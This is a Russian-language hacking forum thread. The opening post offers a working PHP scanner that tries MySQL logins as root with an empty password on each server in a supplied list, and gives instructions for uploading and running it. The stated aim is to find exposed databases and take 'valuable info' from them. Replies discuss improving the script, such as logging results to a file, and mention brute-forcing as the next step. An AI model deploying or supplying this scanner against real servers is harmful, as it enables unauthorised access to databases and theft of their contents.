Хочу представить вашему вниманию сканер.
Код сканера взят с inattack.ru (c)
<?
set_time_limit(0);
# берём список серверов для сканирования из файла servers.dat
$servers=file("servers.dat");
# получаем кол-во записей в файле
$strings=count($servers);
for($i=0; $i<$strings; $i++){
$server=$servers[$i];
# функция коннекта к базе, передаем переменную $server
connect($server);
}
function connect($server)
# а вот и сама функция подключения
{
# коннект к базе (сервер,"логин","пароль")
$co=mysql_connect($server,"root","");
# если подключится не удалось
if(!($co))
{
echo "connect 2 server $server failed<br>";
}
# если подключились то выводим сообщение
else
{
echo "connect 2 server $server success<br>";
}
}
?>


Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
достаточно много и кто ищет тот всегда найдёт.
Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.

Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...

Дэ, конечно...
Хоть бы результат в файл писал... и если, уж на то пошло, то ignore_user_abort(); не помешал бы...

А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?

А нах ignore_user_abort(); , если вывод в браузер идет, а не в файл?
Так я и написал, что надо вывод в файл делать а не в браузер. Закроешь и пистец результату.

ignore_user_abort();
Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.

Уважаемый, если вывод идет в браузер, то потеря последует только если у Вас кривые руки.
Вот кто писал этот скрипт, тот криворукий.
Представь, что в файле 10000000 ссылок. И подумай сколько они будет проверятся. Мне кажется удобнее, то закрыть браузер на это время. Потом я более чем уверен, что ты будешь делать копипаст из браузера, в файл. Тебе говорят как удобнее будет. И как правильнее.

Хорошо учту.
Но в файле столько ссылок быть не может ;)

Вот кто писал этот скрипт, тот криворукий.
насколько я помню, написал 1dt.w0lf_, но не столь важно. скрипт уже не актуален, ибо сервера MySQL очень редко оставляют с дефолтовым доступом root:пустой пароль.
можно, конечно, его переделать так чтобы проводить брут, но на php сканирование будет проходить медленно, да и брутеров mysql много уже...